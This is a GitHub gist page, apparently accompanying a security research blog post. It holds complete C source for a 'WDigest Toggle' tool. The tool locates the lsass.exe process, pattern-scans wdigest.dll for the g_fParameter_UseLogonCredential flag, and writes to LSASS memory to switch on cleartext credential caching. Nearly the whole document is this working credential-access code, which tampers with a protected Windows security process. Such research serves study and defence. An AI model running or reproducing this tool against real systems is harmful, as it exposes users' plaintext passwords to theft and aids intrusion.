-
-
Save xpn/163360379f3cce2443a7b074f0a173b8 to your computer and use it in GitHub Desktop.
#blog
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <windows.h> | |
#include <tlhelp32.h> | |
// Signature for inst to cmp dword ptr [wdigest!g_fParameter_UseLogonCredential],ebx | |
unsigned char signature[] = { 0xf7, 0x47, 0x50, 0x00, 0x08, 0x00, 0x00, 0x0f, 0x85, 0xfe, 0x71, 0x00, 0x00, 0x39, 0x1d }; | |
// Open a handle to the LSASS process | |
HANDLE GrabLsassHandle(int pid) { | |
HANDLE procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, pid); | |
return procHandle; | |
} | |
// Write memory to LSASS process | |
SIZE_T WriteToLsass(HANDLE hLsass, void* addr, void *memIn, int memInLen) { | |
SIZE_T bytesWritten = 0; | |
WriteProcessMemory(hLsass, addr, memIn, memInLen, &bytesWritten); | |
return bytesWritten; | |
} | |
// Searches for lsass.exe PID | |
int GetLsassPid() { | |
PROCESSENTRY32 entry; | |
entry.dwSize = sizeof(PROCESSENTRY32); | |
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); | |
if (Process32First(hSnapshot, &entry)) { | |
while (Process32Next(hSnapshot, &entry)) { | |
if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) { | |
return entry.th32ProcessID; | |
} | |
} | |
} | |
CloseHandle(hSnapshot); | |
return 0; | |
} | |
int ToggleWDigest(HANDLE hLsass) { | |
unsigned char* ptr = 0; | |
ULONG value = 1; | |
ptr = (unsigned char*)LoadLibraryA("wdigest.dll"); | |
if (ptr == NULL) { | |
printf("[x] Error: Could not load wdigest.dll into process\n"); | |
return 1; | |
} | |
printf("[*] Searching for g_fParameter_UseLogonCredential\n"); | |
for (int i = 0; i < 0x220000; i++) { | |
if (ptr[i] == signature[0] && ptr[i + 1] == signature[1]) { | |
if (memcmp(ptr + i, signature, sizeof(signature)) == 0) { | |
ptr += i + sizeof(signature); | |
ptr += (*(DWORD*)ptr) + 4; | |
break; | |
} | |
} | |
} | |
if (ptr == (unsigned char*)0) { | |
printf("[x] Error: Could not find signature in wdigest.dll\n"); | |
return 1; | |
} | |
printf("[*] Found g_fParameter_UseLogonCredential at %p\n", ptr); | |
printf("[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n"); | |
// No need to check in lsass, as Windows ASLR loads at the same address across processes | |
WriteToLsass(hLsass, ptr, &value, sizeof(value)); | |
printf("[*] Done... wdigest credential caching should now be on\n"); | |
} | |
int main() | |
{ | |
int lsassPid; | |
HANDLE hLsass; | |
printf("[ WDigest Toggle ]\n"); | |
printf(" @_xpn_\n\n"); | |
lsassPid = GetLsassPid(); | |
if (lsassPid == 0) { | |
printf("[x] Error: Could not find lsass.exe process\n"); | |
return 1; | |
} | |
hLsass = GrabLsassHandle(lsassPid); | |
if (hLsass == INVALID_HANDLE_VALUE) { | |
printf("[x] Error: Could not open lsass.exe\n"); | |
return 1; | |
} | |
ToggleWDigest(hLsass); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment